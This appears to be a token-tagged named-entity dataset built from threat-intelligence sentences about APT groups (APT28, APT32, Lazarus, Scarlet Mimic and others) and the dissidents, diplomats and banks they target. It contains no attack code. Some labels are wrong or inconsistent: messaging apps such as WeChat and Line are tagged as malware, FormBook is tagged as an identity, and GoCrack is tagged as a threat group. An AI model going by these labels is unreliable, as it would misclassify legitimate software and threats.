+data O +that O +, O +among O +other O +things O +, O +shows O +that O +Silence O +was O +targeting O +employees S-IDTY +from O +financial B-IDTY +entities E-IDTY +, O +specifically O +in O +the O +Russian B-LOC +Federation E-LOC +and O +the O +Republic B-LOC +of I-LOC +Belarus E-LOC +. 
O + +While O +the O +Sima O +moniker O +could O +similarly O +originate O +from O +software O +labels O +, O +it O +is O +a O +common O +female O +Persian O +name O +and O +a O +Persian-language O +Word S-TOOL +for O +" O +visage O +" O +or O +" O +appearance O +" O +. O +Given O +its O +use O +in O +more O +advanced O +social B-IDTY +engineering I-IDTY +campaigns E-IDTY +against O +women B-IDTY +'s I-IDTY +rights I-IDTY +activists E-IDTY +, O +the O +label O +seem O +particularly O +apt O +. O + +Samples O +and O +resource O +names O +contained O +the O +family O +names O +of O +prominent O +Iranians S-IDTY +, O +and O +several O +of O +these O +individuals O +received O +the O +malware O +located O +in O +their O +respective O +folder O +. O + +For O +the O +sake O +of O +narrative O +we O +are O +going O +to O +focus O +exclusively O +to O +those O +samples O +we O +identified O +being O +used O +in O +attacks O +against O +Iranian S-LOC +civil B-IDTY +society E-IDTY +and O +diaspora S-IDTY +. O + +After O +reviewing O +all O +the O +malware O +functionalities O +, O +we O +are O +confident O +in O +saying O +that O +the O +attackers S-APT +look O +for O +victims B-IDTY +who I-IDTY +answer E-IDTY +well-defined O +characteristics O +and O +believe O +that O +further O +stages O +of O +the O +attack O +are O +delivered O +only O +to O +those O +who O +fit O +the O +specific O +victim O +profile O +. O + +It's O +coincident O +that O +both O +'darkhydrus' S-APT +APT O +group O +name O +and O +‘Williams’ S-APT +user O +name O +in O +PDB O +path O +found O +in O +this O +Twitter B-IDTY +user E-IDTY +. O + +The O +360 O +Intelligence O +Center O +observed O +four O +distinct O +campaigns O +against O +Pakistan S-LOC +since O +2017 O +(link) O +, O +recently O +targeting O +Pakistani B-IDTY +businessmen E-IDTY +working O +in O +China O +. 
O + +In O +the O +latest O +attack O +, O +Donot B-APT +group E-APT +is O +targeting O +Pakistani B-IDTY +businessman E-IDTY +working O +in O +China S-LOC + +A O +previous O +, O +removed O +, O +report O +from O +another O +vendor O +claimed O +non-specific O +information O +about O +the O +groups' S-APT +interest O +in O +Chinese B-IDTY +universities E-IDTY +, O +but O +that O +report O +has O +been O +removed O +– O +most O +likely O +detections O +were O +related O +to O +students’ O +and O +researchers’ O +scanning O +known O +collected O +samples O +and O +any O +incidents” O +remain O +unconfirmed O +and O +unknown O +. O + +The O +most O +popular O +targets O +of O +SneakyPastes S-APT +are O +embassies S-IDTY +, O +government B-IDTY +entities E-IDTY +, O +education S-IDTY +, O +media B-IDTY +outlets E-IDTY +, O +journalists O +, O +activists S-IDTY +, O +political O +parties O +or O +personnel S-IDTY +, O +healthcare S-IDTY +and O +banking S-IDTY +. O + +Through O +our O +continuous O +monitoring O +of O +threats O +during O +2018 S-TIME +, O +we O +observed O +a O +new O +wave O +of O +attacks O +by O +Gaza B-APT +Cybergang I-APT +Group1 E-APT +targeting O +embassies S-IDTY +and O +political B-IDTY +personnel E-IDTY +. O + +This O +could O +include O +diplomats S-IDTY +, O +experts O +in O +the O +LOCs O +of O +interest O +related O +to O +the O +Digital O +Economy O +Task O +Force O +, O +or O +possibly O +even O +journalists S-IDTY +. O + +This O +focus O +on O +training O +aligns O +with O +LYCEUM’s S-APT +targeting O +of O +executives S-IDTY +, O +HR B-IDTY +staff E-IDTY +, O +and O +IT B-IDTY +personnel E-IDTY +. O + +Despite O +the O +initial O +perception O +that O +the O +maldoc S-MAL +sample O +was O +intended O +for O +ICS S-IDTY +or O +OT B-IDTY +staff E-IDTY +, O +LYCEUM S-APT +has O +not O +demonstrated O +an O +interest O +in O +those O +environments O +. 
O + +The O +threat O +actor’s S-APT +emails S-TOOL +usually O +contain O +a O +picture O +or O +a O +link O +without O +a O +malicious B-FILE +payload E-FILE +and O +are O +sent O +out O +to O +a O +huge O +recipient O +database O +of O +up O +to O +85 O +, O +000 O +users S-IDTY +. O + +Group-IB S-SECTEAM +specialists O +determined O +that O +the O +email S-TOOL +addresses O +of O +IT O +bank S-IDTY +employees S-IDTY +were O +among O +the O +recipients O +of O +these O +emails S-TOOL +. O + +While O +OceanLotus’ S-APT +targets O +are O +global O +, O +their O +operations O +are O +mostly O +active O +within O +the O +APAC S-LOC +region O +which O +encompasses O +targeting O +private O +sectors O +across O +multiple O +industries O +, O +foreign B-IDTY +governments E-IDTY +, O +activists S-IDTY +, O +and O +dissidents S-IDTY +connected O +to O +Vietnam S-LOC +. O + +The O +attackers S-APT +sent O +multiple O +emails S-TOOL +containing O +macro-enabled O +XLS B-FILE +files E-FILE +to O +employees B-IDTY +working I-IDTY +in I-IDTY +the I-IDTY +banking I-IDTY +sector E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O + +Examples O +as O +early O +as O +2008 S-TIME +document B-FILE +malware E-FILE +operations O +against O +Tibetan B-IDTY +non-governmental I-IDTY +organizations E-IDTY +( O +NGOs S-IDTY +) O +that O +also O +targeted O +Falun B-IDTY +Gong E-IDTY +and O +Uyghur B-IDTY +groups E-IDTY +. O + +Based O +on O +this O +, O +we O +believe O +the O +Rancor S-APT +attackers S-APT +were O +targeting O +political B-IDTY +entities E-IDTY +. O + +Other O +groups S-APT +, O +such O +as O +Buhtrap S-APT +, O +Corkow S-MAL +and O +Carbanak S-APT +, O +were O +already O +known O +to O +target O +and O +successfully O +steal O +money O +from O +financial B-IDTY +institutions E-IDTY +and O +their O +customers S-IDTY +in O +Russia S-LOC +. 
O + +Since O +last O +week O +, O +iSIGHT B-SECTEAM +Partners E-SECTEAM +has O +worked O +to O +provide O +details O +on O +the O +power O +outage O +in O +Ukraine S-LOC +to O +our O +global O +customers S-IDTY +. O + +The O +attacks O +we O +attribute O +to O +Scarlet B-APT +Mimic E-APT +have O +primarily O +targeted O +Uyghur S-IDTY +and O +Tibetan B-IDTY +activists E-IDTY +as O +well O +as O +those O +who O +are O +interested O +in O +their O +causes O +. O + +The O +most O +recent O +Scarlet B-ACT +Mimic I-ACT +attacks E-ACT +we O +have O +identified O +were O +conducted O +in O +2015 S-TIME +and O +suggest O +the O +group O +has O +a O +significant O +interest O +in O +both O +Muslim B-IDTY +activists E-IDTY +and O +those O +interested O +in O +critiques O +of O +the O +Russian B-IDTY +government E-IDTY +and O +Russian S-LOC +President O +Vladimir O +Putin O +. O + +Based O +on O +analysis O +of O +the O +data O +and O +malware O +samples O +we O +have O +collected O +, O +Unit B-SECTEAM +42 E-SECTEAM +believes O +the O +attacks O +described O +herein O +are O +the O +work O +of O +a O +group O +or O +set O +of O +cooperating O +groups S-APT +who O +have O +a O +single O +mission O +, O +collecting O +information O +on O +minority B-IDTY +groups E-IDTY +who O +reside O +in O +and O +around O +northwestern B-LOC +China E-LOC +. O + +In O +the O +past O +, O +Scarlet B-APT +Mimic E-APT +has O +primarily O +targeted O +individuals O +who O +belong O +to O +these O +minority B-IDTY +groups E-IDTY +as O +well O +as O +their O +supporters S-IDTY +, O +but O +we've O +recently O +found O +evidence O +to O +indicate O +the O +group O +also O +targets O +individuals O +working O +inside O +government O +anti-terrorist B-IDTY +organizations E-IDTY +. 
O + +Our O +investigation O +showed O +that O +these O +attacks O +were O +targeted O +, O +and O +that O +the O +threat O +actor O +sought O +to O +steal O +communications O +data O +of O +specific B-IDTY +individuals E-IDTY +in O +various O +countries O +. O + +CapabilitiesFormBook S-IDTY +is O +a O +data O +stealer O +, O +but O +not O +a O +full-fledged O +banker S-IDTY +. O + +While O +discussions O +of O +threats O +in O +this O +region O +often O +focus O +on O +" O +North O +America O +" O +generally O +or O +just O +the O +United O +States O +, O +nearly O +100 O +campaigns S-ACT +during O +this O +period O +were O +either O +specifically O +targeted O +at O +Canadian O +organizations O +or O +were O +customized O +for O +Canadian S-LOC +audiences S-IDTY +. O + +In O +all O +emails S-TOOL +sent O +to O +these O +government B-IDTY +officials E-IDTY +, O +the O +actor O +used O +the O +same O +attachment O +: O +a O +malicious B-FILE +Microsoft I-FILE +Word I-FILE +document E-FILE +that O +exploited O +the O +CVE-2012-0158 S-VULID +vulnerability O +to O +drop O +a O +malicious O +payload O +. O + +In O +this O +latest O +incident O +, O +the O +group O +registered O +a O +fake O +news O +domain O +, O +timesofindiaa.in O +, O +on O +May B-TIME +18 E-TIME +, O +2016 S-TIME +, O +and O +then O +used O +it O +to O +send O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +Indian S-LOC +government B-IDTY +officials E-IDTY +on O +the O +same O +day O +. O + +The O +first O +time O +this O +happened O +was O +at O +the O +beginning O +of O +the O +month O +, O +when O +Proofpoint S-SECTEAM +researchers O +blew O +the O +lid O +off O +a O +cyber-espionage B-ACT +campaign E-ACT +named O +Operation B-ACT +Transparent I-ACT +Tribe E-ACT +, O +which O +targeted O +the O +Indian O +embassies S-IDTY +in O +Saudi B-LOC +Arabia E-LOC +and O +Kazakhstan S-LOC +. 
O + +Back O +in O +February B-TIME +2016 E-TIME +, O +Indian O +army B-IDTY +officials E-IDTY +issued O +a O +warning O +against O +the O +usage O +of O +three O +apps O +, O +WeChat S-MAL +, O +SmeshApp S-MAL +, O +and O +Line S-MAL +, O +fearing O +that O +these O +apps O +collected O +too O +much O +information O +if O +installed O +on O +smartphones O +used O +by O +Indian O +army B-IDTY +personnel E-IDTY +. O + +According O +to O +the O +security B-IDTY +firm E-IDTY +, O +this O +campaign O +targeted O +Indian O +military B-IDTY +officials E-IDTY +via O +spear-phishing S-ACT +emails S-TOOL +, O +distributing O +spyware O +to O +its O +victims O +via O +an O +Adobe B-TOOL +Reader E-TOOL +vulnerability S-VULNAME +. O + +In O +addition O +to O +these O +, O +the O +Animal O +Farm O +attackers O +used O +at O +least O +one O +unknown O +, O +mysterious O +malware O +during O +an O +operation O +targeting O +computer O +users S-IDTY +in O +Burkina O +Faso O +. O + +PLATINUM S-APT +'s O +persistent O +use O +of O +spear B-ACT +phishing I-ACT +tactics E-ACT +( O +phishing S-ACT +attempts O +aimed O +at O +specific B-IDTY +individuals E-IDTY +) O +and O +access O +to O +previously O +undiscovered O +zero-day S-VULNAME +exploits O +have O +made O +it O +a O +highly O +resilient O +threat O +. O + +The O +group O +'s O +persistent O +use O +of O +spear B-ACT +phishing I-ACT +tactics E-ACT +( O +phishing S-ACT +attempts O +aimed O +at O +specific B-IDTY +individuals E-IDTY +) O +and O +access O +to O +previously O +undiscovered O +zero-day S-VULNAME +exploits O +have O +made O +it O +a O +highly O +resilient O +threat O +. O + +Researching O +this O +attack O +and O +the O +malware O +used O +therein O +led O +Microsoft S-IDTY +to O +discover O +other O +instances O +of O +PLATINUM S-APT +attacking O +users S-IDTY +in O +India S-LOC +around O +August B-TIME +2015 E-TIME +. 
O + +The O +Poseidon B-APT +Group E-APT +actively O +targets O +this O +sort O +of O +corporate O +environment O +for O +the O +theft O +of O +intellectual O +property O +and O +commercial O +information O +, O +occasionally O +focusing O +on O +personal O +information O +on O +executives S-IDTY +. O + +The O +previous O +two O +volumes O +of O +the O +Microsoft S-IDTY +Security O +Intelligence O +Report O +explored O +the O +activities S-ACT +of O +two O +such O +groups S-APT +, O +code-named O +STRONTIUM S-APT +and O +PLATINUM S-APT +, O +which O +used O +previously O +unknown O +vulnerabilities O +and O +aggressive O +, O +persistent O +techniques O +to O +target O +specific B-IDTY +individuals E-IDTY +and O +institutions S-IDTY +— O +often O +including O +military S-IDTY +installations O +, O +intelligence B-IDTY +agencies E-IDTY +, O +and O +other O +government S-IDTY +bodies O +. O + +Mark B-IDTY +Zuckerberg E-IDTY +, O +Jack B-IDTY +Dorsey E-IDTY +, O +Sundar B-IDTY +Pichai E-IDTY +, O +and O +Daniel B-IDTY +Ek E-IDTY +— O +the O +CEOs S-IDTY +of O +Facebook S-IDTY +, O +Twitter S-IDTY +, O +Google S-IDTY +and O +Spotify O +, O +respectively O +— O +have O +also O +fallen O +victim O +to O +the O +hackers O +, O +dispelling O +the O +notion O +that O +a O +career O +in O +software O +and O +technology S-IDTY +exempts O +one O +from O +being O +compromised O +. O + +The O +group O +is O +well O +known O +: O +They O +hijacked O +WikiLeaks' S-SECTEAM +DNS S-PROT +last O +month O +shortly O +after O +they O +took O +over O +HBO O +'s O +Twitter S-IDTY +account O +; O +last O +year O +, O +they O +took O +over O +Mark B-IDTY +Zuckerberg E-IDTY +'s O +Twitter S-IDTY +and O +Pinterest S-IDTY +accounts O +; O +and O +they O +hit O +both O +BuzzFeed S-IDTY +and O +TechCrunch S-IDTY +not O +long O +after O +that O +. 
O + +OurMine S-APT +is O +well O +known O +: O +They O +hijacked O +WikiLeaks' S-SECTEAM +DNS S-PROT +last O +month O +shortly O +after O +they O +took O +over O +HBO O +'s O +Twitter S-IDTY +account O +; O +last O +year O +, O +they O +took O +over O +Mark B-IDTY +Zuckerberg E-IDTY +'s O +Twitter S-IDTY +and O +Pinterest S-IDTY +accounts O +; O +and O +they O +hit O +both O +BuzzFeed S-IDTY +and O +TechCrunch S-IDTY +not O +long O +after O +that O +. O + +Probably O +the O +most O +high-profile O +attack O +that O +GandCrab S-MAL +was O +behind O +is O +a O +series O +of O +infections O +at O +customers S-IDTY +of O +remote O +IT B-IDTY +support I-IDTY +firms E-IDTY +in O +the O +month O +of O +February O +. O + +Further O +tracking O +of O +the O +Lazarus’s S-APT +activities O +has O +enabled O +Kaspersky S-SECTEAM +researchers O +to O +discover O +a O +new O +operation O +, O +active O +since O +at O +least O +November B-TIME +2018 E-TIME +, O +which O +utilizes O +PowerShell S-MAL +to O +control O +Windows S-OS +systems O +and O +Mac O +OS O +malware O +to O +target O +Apple B-IDTY +customers E-IDTY +. O + +Users S-IDTY +who O +failed O +to O +patch O +their O +systems O +may O +find O +themselves O +mining O +cryptocurrency O +for O +threat O +actors S-APT +. O + +Keeping O +in O +mind O +the O +sensitivity O +of O +passwords O +, O +GoCrack S-APT +includes O +an O +entitlement-based O +system O +that O +prevents O +users O +from O +accessing O +task O +data O +unless O +they O +are O +the O +original O +creator O +or O +they O +grant O +additional B-IDTY +users E-IDTY +to O +the O +task O +. O + +The O +threat O +actor’s S-APT +emails S-TOOL +usually O +contain O +a O +picture O +or O +a O +link O +without O +a O +malicious B-FILE +payload E-FILE +and O +are O +sent O +out O +to O +a O +huge O +recipient O +database O +of O +up O +to O +85 O +, O +000 O +users S-IDTY +. 
O + +The O +admin@338 S-APT +previous O +activities S-ACT +against O +financial S-IDTY +and O +policy B-IDTY +organizations E-IDTY +have O +largely O +focused O +on O +spear B-ACT +phishing E-ACT +emails S-TOOL +written O +in O +English O +, O +destined O +for O +Western S-LOC +audiences S-IDTY +. O + +This O +week O +the O +experts O +at O +FireEye S-SECTEAM +discovered O +that O +a O +group O +of O +Chinese-based S-LOC +hackers O +called O +admin@338 S-APT +had O +sent O +multiple O +MH370-themed O +spear B-ACT +phishing E-ACT +emails S-TOOL +, O +the O +attackers S-APT +targeted O +government B-IDTY +officials E-IDTY +in O +Asia-Pacific S-LOC +, O +it O +is O +likely O +for O +cyber B-APT +espionage E-APT +purpose O +. O + +The O +attackers S-APT +used O +the O +popular O +Poison B-MAL +Ivy I-MAL +RAT E-MAL +and O +WinHTTPHelper S-MAL +malware S-MAL +to O +compromise O +the O +computers O +of O +government B-IDTY +officials E-IDTY +. O + +The O +admin@338 S-APT +used O +the O +popular O +Poison B-MAL +Ivy I-MAL +RAT E-MAL +and O +WinHTTPHelper S-MAL +malware S-MAL +to O +compromise O +the O +computers O +of O +government B-IDTY +officials E-IDTY +. O + +The O +group O +previous O +activities S-ACT +against O +financial S-IDTY +and O +policy B-IDTY +organizations E-IDTY +have O +largely O +focused O +on O +spear B-ACT +phishing E-ACT +emails S-TOOL +written O +in O +English O +, O +destined O +for O +Western S-LOC +audiences S-IDTY +. O + +The O +targets O +were O +similar O +to O +a O +2015 S-TIME +TG-4127 B-ACT +campaign E-ACT +— O +individuals O +in O +Russia S-LOC +and O +the O +former B-LOC +Soviet E-LOC +states O +, O +current O +and O +former O +military S-IDTY +and O +government B-IDTY +personnel E-IDTY +in O +the O +U.S. 
S-LOC +and O +Europe S-LOC +, O +individuals O +working O +in O +the O +defense S-IDTY +and O +government S-IDTY +supply O +chain O +, O +and O +authors S-IDTY +and O +journalists S-IDTY +— O +but O +also O +included O +email S-ACT +accounts O +linked O +to O +the O +November B-TIME +2016 E-TIME +United B-LOC +States E-LOC +presidential O +election O +. O + +APT28 B-ACT +espionage I-ACT +activity E-ACT +has O +primarily O +targeted O +entities O +in O +the O +U.S. S-LOC +, O +Europe S-LOC +, O +and O +the O +countries O +of O +the O +former B-LOC +Soviet I-LOC +Union E-LOC +, O +including O +governments S-IDTY +, O +militaries S-IDTY +, O +defense B-IDTY +attaches E-IDTY +, O +media B-IDTY +entities E-IDTY +, O +and O +dissidents S-IDTY +and O +figures S-IDTY +opposed O +to O +the O +current O +Russian B-IDTY +government E-IDTY +. O + +APT28 B-ACT +espionage I-ACT +activity E-ACT +has O +primarily O +targeted O +entities O +in O +the O +U.S. S-LOC +, O +Europe S-LOC +, O +and O +the O +countries O +of O +the O +former B-LOC +Soviet I-LOC +Union E-LOC +, O +including O +governments S-IDTY +and O +militaries S-IDTY +, O +defense B-IDTY +attaches E-IDTY +, O +media B-IDTY +entities E-IDTY +, O +and O +dissidents S-IDTY +and O +figures S-IDTY +opposed O +to O +the O +current O +Russian B-IDTY +government E-IDTY +. O + +APT28 S-APT +targets O +Russian S-LOC +rockers S-IDTY +and O +dissidents B-IDTY +Pussy I-IDTY +Riot E-IDTY +via O +spear-phishing S-ACT +emails S-TOOL +. O + +We O +have O +reasons O +to O +believe O +that O +the O +operators S-APT +of O +the O +APT28 S-APT +network O +are O +either O +Russian S-LOC +citizens S-IDTY +or O +citizens S-IDTY +of O +a O +neighboring O +country O +that O +speak O +Russian S-LOC +. 
O + +Russian S-LOC +citizens—journalists S-IDTY +, O +software B-IDTY +developers E-IDTY +, O +politicians S-IDTY +, O +researchers B-IDTY +at I-IDTY +universities E-IDTY +, O +and O +artists S-IDTY +are O +also O +targeted O +by O +Pawn B-APT +Storm E-APT +. O + +In O +addition O +to O +focused O +targeting O +of O +the O +private O +sector O +with O +ties O +to O +Vietnam S-LOC +, O +APT32 S-APT +has O +also O +targeted O +foreign O +governments S-IDTY +, O +as O +well O +as O +Vietnamese S-LOC +dissidents S-IDTY +and O +journalists S-IDTY +since O +at O +least O +2013 S-TIME +. O + +In O +2014 S-TIME +, O +APT32 S-APT +leveraged O +a O +spear-phishing S-ACT +attachment E-ACT +titled O +" O +Plans O +to O +crackdown O +on O +protesters O +at O +the O +Embassy O +of O +Vietnam.exe S-FILE +, O +" O +which O +targeted O +dissident O +activity O +among O +the O +Vietnamese S-LOC +diaspora S-IDTY +in O +Southeast B-LOC +Asia E-LOC +. O + +In O +2017 S-TIME +, O +social B-IDTY +engineering E-IDTY +content O +in O +lures O +used O +by O +the O +actor S-APT +provided O +evidence O +that O +they O +were O +likely O +used O +to O +target O +members O +of O +the O +Vietnam S-LOC +diaspora S-IDTY +in O +Australia S-LOC +as O +well O +as O +government B-IDTY +employees E-IDTY +in O +the O +Philippines S-LOC +. O + +APT33 S-APT +sent O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +employees S-IDTY +whose O +jobs O +related O +to O +the O +aviation B-IDTY +industry E-IDTY +. O + +APT37 S-APT +targeted O +a O +research B-IDTY +fellow E-IDTY +, O +advisory B-IDTY +member E-IDTY +, O +and O +journalist S-IDTY +associated O +with O +different O +North B-LOC +Korean E-LOC +human O +rights O +issues O +and O +strategic B-IDTY +organizations E-IDTY +. 
O + +The O +majority O +of O +APT37 B-ACT +activity E-ACT +continues O +to O +target O +South B-LOC +Korea E-LOC +, O +North B-LOC +Korean E-LOC +defectors S-IDTY +, O +and O +organizations O +and O +individuals O +involved O +in O +Korean B-LOC +Peninsula E-LOC +reunification O +efforts O +. O + +In O +May B-TIME +2017 E-TIME +, O +APT37 S-APT +used O +a O +bank O +liquidation O +letter O +as O +a O +spear B-ACT +phishing I-ACT +lure E-ACT +against O +a O +board B-IDTY +member E-IDTY +of O +a O +Middle B-LOC +Eastern E-LOC +financial B-IDTY +company E-IDTY +. O + +Per O +the O +complaint O +, O +the O +email S-ACT +account O +watsonhenny@gmail.com S-EMAIL +was O +used O +to O +send O +LinkedIn O +invitations O +to O +employees S-IDTY +of O +a O +bank O +later O +targeted O +by O +APT38 S-APT +. O + +The O +APT38 S-APT +uses O +DYEPACK S-MAL +to O +manipulate O +the O +SWIFT O +transaction O +records O +and O +hide O +evidence O +of O +the O +malicious O +transactions O +, O +so O +bank B-IDTY +personnel E-IDTY +are O +none O +the O +wiser O +when O +they O +review O +recent O +transactions O +. O + +APT39 S-APT +'s O +focus O +on O +the O +telecommunications B-IDTY +and I-IDTY +travel I-IDTY +industries E-IDTY +suggests O +intent O +to O +perform O +monitoring O +, O +tracking O +, O +or O +surveillance O +operations O +against O +specific B-IDTY +individuals E-IDTY +, O +collect O +proprietary O +or O +customer O +data O +for O +commercial O +or O +operational O +purposes O +that O +serve O +strategic O +requirements O +related O +to O +national O +priorities O +, O +or O +create O +additional O +accesses O +and O +vectors O +to O +facilitate O +future O +campaigns S-ACT +. 
O + +Other O +groups S-APT +attributed O +to O +Iranian S-LOC +attackers S-APT +, O +such O +as O +Rocket B-APT +Kitten E-APT +, O +have O +targeted O +Iranian S-LOC +individuals O +in O +the O +past O +, O +including O +anonymous B-IDTY +proxy I-IDTY +users E-IDTY +, O +researchers S-IDTY +, O +journalists S-IDTY +, O +and O +dissidents S-IDTY +. O + +We O +believe O +that O +the O +Carbanak S-MAL +campaign O +is O +a O +clear O +indicator O +of O +a O +new O +era O +in O +cybercrime O +in O +which O +criminals S-APT +use O +APT B-ACT +techniques E-ACT +directly O +against O +the O +financial B-IDTY +industry E-IDTY +instead O +of O +through O +its O +customers S-IDTY +. O + +Carbanak S-MAL +has O +its O +origin O +in O +more O +common O +financial O +fraud O +including O +theft O +from O +consumer S-IDTY +and O +corporate O +bank O +accounts O +in O +Europe S-LOC +and O +Russia S-LOC +, O +using O +standard O +banking O +malware O +, O +mainly O +Carberp S-MAL +. O + +The O +group O +has O +its O +origin O +in O +more O +common O +financial O +fraud O +including O +theft O +from O +consumer S-IDTY +and O +corporate O +bank O +accounts O +in O +Europe S-LOC +and O +Russia S-LOC +, O +using O +standard O +banking O +malware O +, O +mainly O +Carberp S-MAL +. O + +Gallmaker S-APT +'s O +targets O +are O +embassies S-IDTY +of O +an O +Eastern B-LOC +European E-LOC +country O +. O + +However O +, O +in O +September S-TIME +last O +year O +, O +our O +friends O +at O +CSIS S-SECTEAM +published O +a O +blog O +detailing O +a O +new O +Carbanak S-MAL +variant O +affecting O +one O +of O +its O +customers S-IDTY +. O + +360 S-SECTEAM +and O +Tuisec S-SECTEAM +already O +identified O +some O +Gorgon B-APT +Group E-APT +members S-IDTY +. O + +Symantec S-SECTEAM +also O +confirmed O +seeing O +the O +Lazarus S-APT +wiper O +tool O +in O +Poland S-LOC +at O +one O +of O +their O +customers S-IDTY +. 
O + +This O +new O +campaign O +, O +dubbed O +HaoBao S-ACT +, O +resumes O +Lazarus S-APT +' O +previous O +phishing B-ACT +emails S-TOOL +, O +posed O +as O +employee O +recruitment O +, O +but O +now O +targets O +Bitcoin B-IDTY +users E-IDTY +and O +global O +financial B-IDTY +organizations E-IDTY +. O + +Beginning O +in O +2017 S-TIME +, O +the O +Lazarus B-APT +group E-APT +heavily O +targeted O +individuals O +with O +spear B-ACT +phishing E-ACT +emails S-TOOL +impersonating O +job B-IDTY +recruiters E-IDTY +which O +contained O +malicious O +documents O +. O + +We O +concluded O +that O +Lazarus B-APT +Group E-APT +was O +responsible O +for O +WannaCry S-MAL +, O +a O +destructive O +attack O +in O +May S-TIME +that O +targeted O +Microsoft B-IDTY +customers E-IDTY +. O + +The O +targeting O +of O +this O +individual S-IDTY +suggests O +the O +actors S-APT +are O +interested O +in O +breaching O +the O +French O +Ministry O +of O +Foreign O +Affairs O +itself O +or O +gaining O +insights O +into O +relations O +between O +France S-LOC +and O +Taiwan S-LOC +. O + +On O +November B-TIME +10 I-TIME +, I-TIME +2015 E-TIME +, O +threat O +actors S-APT +sent O +a O +spear-phishing S-ACT +email E-ACT +to O +an O +individual S-IDTY +at O +the O +French O +Ministry O +of O +Foreign O +Affairs O +. O + +On O +November B-TIME +10 I-TIME +, I-TIME +2015 E-TIME +, O +Lotus B-APT +Blossom E-APT +sent O +a O +spear-phishing S-ACT +email E-ACT +to O +an O +individual S-IDTY +at O +the O +French O +Ministry O +of O +Foreign O +Affairs O +. O + +APT B-APT +threat I-APT +actors E-APT +, O +most O +likely O +nation O +state-sponsored O +, O +targeted O +a O +diplomat S-IDTY +in O +the O +French O +Ministry O +of O +Foreign O +Affairs O +with O +a O +seemingly O +legitimate O +invitation O +to O +a O +technology O +conference O +in O +Taiwan S-LOC +. 
O + +Additionally O +, O +the O +targeting O +of O +a O +French B-IDTY +diplomat E-IDTY +based O +in O +Taipei O +, O +Taiwan S-LOC +aligns O +with O +previous O +targeting O +by O +these O +actors S-APT +, O +as O +does O +the O +separate O +infrastructure O +. O + +Since O +at O +least O +2014 S-TIME +, O +APT32 S-APT +, O +also O +known O +as O +the O +OceanLotus B-APT +Group E-APT +, O +has O +targeted O +foreign B-IDTY +corporations E-IDTY +with O +investments O +in O +Vietnam S-LOC +, O +foreign B-IDTY +governments E-IDTY +, O +journalists S-IDTY +, O +and O +Vietnamese S-LOC +dissidents S-IDTY +. O + +APT35 S-APT +typically O +targets O +U.S. S-LOC +and O +the O +Middle B-LOC +Eastern E-LOC +military S-IDTY +, O +diplomatic S-IDTY +and O +government B-IDTY +personnel E-IDTY +, O +organizations S-IDTY +in O +the O +media S-IDTY +, O +energy S-IDTY +and O +defense B-IDTY +industrial I-IDTY +base E-IDTY +( O +DIB S-IDTY +) O +, O +and O +engineering S-IDTY +, O +business B-IDTY +services E-IDTY +and O +telecommunications B-IDTY +sectors E-IDTY +. O + +COBALT B-APT +GYPSY E-APT +has O +used O +spearphishing S-ACT +to O +target O +telecommunications S-IDTY +, O +government S-IDTY +, O +defense S-IDTY +, O +oil S-IDTY +, O +and O +financial B-IDTY +services I-IDTY +organizations E-IDTY +based O +in O +or O +affiliated O +with O +the O +MENA S-LOC +region O +, O +identifying O +individual B-IDTY +victims E-IDTY +through O +social B-IDTY +media E-IDTY +sites O +. O + +The O +Magic O +Hound O +has O +repeatedly O +used O +social B-IDTY +media E-IDTY +to O +identify O +and O +interact O +with O +employees S-IDTY +at O +targeted O +organizations O +and O +then O +used O +weaponized O +Excel B-ACT +documents E-ACT +. 
O + +The O +May B-TIME +2014 E-TIME +' O +Operation B-ACT +Saffron I-ACT +Rose E-ACT +' O +publication O +identifies O +an O +Iranian S-LOC +hacking O +group O +formerly O +named O +' O +Ajax B-APT +Security E-APT +' O +( O +code-named O +' O +Flying B-APT +Kitten E-APT +' O +by O +CrowdStrike S-SECTEAM +) O +engaged O +in O +active O +spear B-ACT +phishing I-ACT +attacks E-ACT +on O +Iranian S-LOC +dissidents S-IDTY +( O +those O +attempting O +to O +circumvent O +government O +traffic O +monitoring O +) O +. O + +An O +Iranian S-LOC +hacking O +group O +formerly O +named O +Ajax B-APT +Security E-APT +( O +code-named O +' O +Flying B-APT +Kitten E-APT +' O +by O +CrowdStrike S-SECTEAM +) O +engaged O +in O +active O +spear B-ACT +phishing I-ACT +attacks E-ACT +on O +Iranian S-LOC +dissidents S-IDTY +( O +those O +attempting O +to O +circumvent O +government O +traffic O +monitoring O +) O +. O + +PIVY S-MAL +also O +played O +a O +key O +role O +in O +the O +2011 B-ACT +campaign E-ACT +known O +as O +Nitro O +that O +targeted O +chemical B-IDTY +makers E-IDTY +, O +government B-IDTY +agencies E-IDTY +, O +defense B-IDTY +contractors E-IDTY +, O +and O +human O +rights O +groups.10,11 O +Still O +active O +a O +year O +later O +, O +the O +Nitro O +attackers S-APT +used O +a O +zero-day S-VULNAME +vulnerability O +in O +Java O +to O +deploy O +PIVY S-MAL +in O +2012 S-TIME +. O + +APT10 S-APT +is O +known O +to O +have O +exfiltrated O +a O +high O +volume O +of O +data O +from O +multiple O +victims O +, O +exploiting O +compromised O +MSP B-MAL +networks E-MAL +, O +and O +those O +of O +their O +customers S-IDTY +, O +to O +stealthily O +move O +this O +data O +around O +the O +world O +. 
O + +Targeted O +sectors O +of O +Molerats S-APT +include O +governmental S-IDTY +and O +diplomatic I-IDTY +institutions E-IDTY +, O +including O +embassies S-IDTY +; O +companies O +from O +the O +aerospace S-IDTY +and O +defence B-IDTY +Industries E-IDTY +; O +financial B-IDTY +institutions E-IDTY +; O +journalists S-IDTY +; O +software B-IDTY +developers E-IDTY +. O + +It O +was O +during O +operator O +X O +'s O +network O +monitoring O +that O +the O +attackers S-APT +placed O +Naikon B-MAL +proxies E-MAL +within O +the O +countries O +' O +borders O +, O +to O +cloak O +and O +support O +real-time O +outbound O +connections O +and O +data O +Exfiltration S-ACT +from O +high-profile O +victim O +organizations E-IDTY +. O + +In O +early B-TIME +May I-TIME +2016 E-TIME +, O +both O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +started O +conducting O +attack B-ACT +campaigns E-ACT +against O +specific B-IDTY +individuals E-IDTY +in O +Europe S-LOC +. O + +Although O +most O +malware O +today O +either O +seeks O +monetary O +gain O +or O +conducts O +espionage S-ACT +for O +economic S-IDTY +advantage O +, O +both O +of O +these O +activity B-APT +groups E-APT +appear O +to O +seek O +information O +about O +specific B-IDTY +individuals E-IDTY +. O + +Attackers S-APT +using O +several O +locations O +in O +China S-LOC +have O +leveraged O +C&C S-TOOL +servers O +on O +purchased O +hosted O +services O +in O +the O +United 